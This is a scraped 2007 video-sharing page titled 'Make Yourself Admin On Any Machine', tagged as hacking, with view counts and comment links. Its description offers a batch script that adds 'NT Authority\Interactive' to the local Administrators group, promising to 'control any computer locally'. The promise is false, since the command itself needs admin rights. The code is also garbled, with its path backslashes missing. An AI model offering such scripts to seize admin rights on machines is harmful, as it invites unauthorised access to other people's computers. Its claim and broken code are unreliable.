Metacafe Header Takeover

Make Yourself Admin On Any Machine

Tags:
Hacked Hackers Windows Windows XP Win H4ck3er Admin Administrator Password Hacks Microsoft Batch Script
diesl0w
  • By: diesl0w
  • Subscribers: 20
  • Updated: 10-Aug-07
  • Videos: 12
  • United States International
  • Comments: 9
  • Views: 16,817
  • Added: 04-Aug-07

control any computer locally with this script

@echo off

setlocal
set OK=N
for /f "Tokens=*" %%a in ('%SystemRoot%system32net.exe LOCALGROUP "Administrators" ^ %SystemRoot%system32find.exe /i "NT AuthorityInteractive"') do (
set OK=Y
)
If "%OK%" EQU "N" %SystemRoot%system32net.exe LOCALGROUP "Administrators" "NT AuthorityInteractive" /ADD
endlocal

add this batch script to a notepad and wahlah

  1. Categories: How To, Science & Tech
  2. Favorite On: shreddn1 ankushdave p3acesoldier Gil02 emperer
Comments on

Make Yourself Admin On Any Machine

9 Comments | Add Comment 9 Comments | Add Comment